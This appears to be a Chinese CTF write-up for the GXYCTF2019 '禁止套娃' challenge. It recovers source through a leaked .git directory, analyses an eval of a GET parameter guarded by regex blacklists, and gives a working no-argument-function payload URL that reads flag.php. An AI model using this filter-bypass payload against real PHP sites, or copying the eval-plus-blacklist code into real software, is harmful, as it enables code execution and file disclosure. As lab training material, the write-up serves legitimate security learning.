[GXYCTF2019]禁止套娃

目录遍历发现/.git泄露

 

 

 使用GitHack工具进行利用

https://github.com/lijiejie/GitHack

执行命令后会得到index.php

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

没有看懂第6行代码的正则过滤，查看了其他大佬的wp，总结一下

可以看到第9行@eval($_GET['exp']);是一句话木马
第5行的if过滤的是常用伪协议
第6行的if，(?R)引用当前表达式，后面加了?递归调用，只能匹配通过无参数的函数，所以一个合法的表达式可以是a(b();)，括号和字符组成的
第7行的if，正则匹配掉了et|na|info|dec|bin|hex|oct|pi|log关键字

通过目录遍历可以知道flag.php在当前目录下面，我们可以使用函数scandir(".")扫描当期目录，问题是如何构造a(b();)类型

我们可以通过current(localeconv())构造"."

var_dump(current(localeconv()));

运行结果

string(1) "."

使用如下语句便可以发现当期目录下的文件

var_dump(scandir(current(localeconv())));

 

 

 然后我们可以使用readfile()或highlight_file()或show_source()读取flag。因为flag.php在倒数第二个位置，所以需要将数组翻转，使用next()指向下一个数组位置

payLoad：

http://1110e0a5-3530-43e1-a6f0-9cd89da115f4.node3.buuoj.cn/?exp=var_dump(show_source(next(array_reverse(scandir(current(localeconv()))))));